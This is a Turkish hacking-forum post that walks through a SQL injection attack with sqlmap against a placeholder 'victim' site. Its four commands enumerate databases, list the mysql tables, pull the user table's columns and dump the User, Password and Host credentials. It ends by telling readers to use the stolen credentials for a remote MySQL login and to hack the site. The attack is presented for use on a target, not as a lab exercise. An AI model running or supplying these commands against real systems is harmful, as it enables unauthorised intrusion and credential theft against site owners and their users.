Sqlmap ile Mysql Veritabanı Hack

Sqlmap ile Mysql veritabanı Hack *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***

Sqlmap ile Mysql veritabanı Hack
View hidden content is available for registered users!

Kaynak = http://www.securityhell.info/2017/09/22/sqlmap-mysql-hack/

Merhaba beyler, hemen konuya geçelim.
Sqlmap dizinine gelin ve sırasıyla gösterdiğim komutları uygulayın;

sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent --dbs



Komutumuzu vererek sitemizin veritabanı bilgilerini öğreneceğiz. Bize burda lazım olacak olan mysql veritabanıdır.
Hemen mysql veritabanındaki tabloları çekiyoruz;

sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql --tables



ve ardından User tablomuzdaki kolonları çekiyoruz;



sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql -T user --columns



Kolonlar geldikten sonra bize gerekli olanları yani User, Password ve Host kolonlarındaki bilgileri çekiyoruz.

sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql -T user -C User,Password,Host --dump

ve bilgiler elimizde, bu bilgiler ile linux da remote mysql bağlantısı yaparak siteyi hackleyebilirsiniz.
 
Son düzenleme:
131,819Konular
3,271,658Mesajlar
316,282Kullanıcılar
KaplanphpsSon Üye
Üst Alt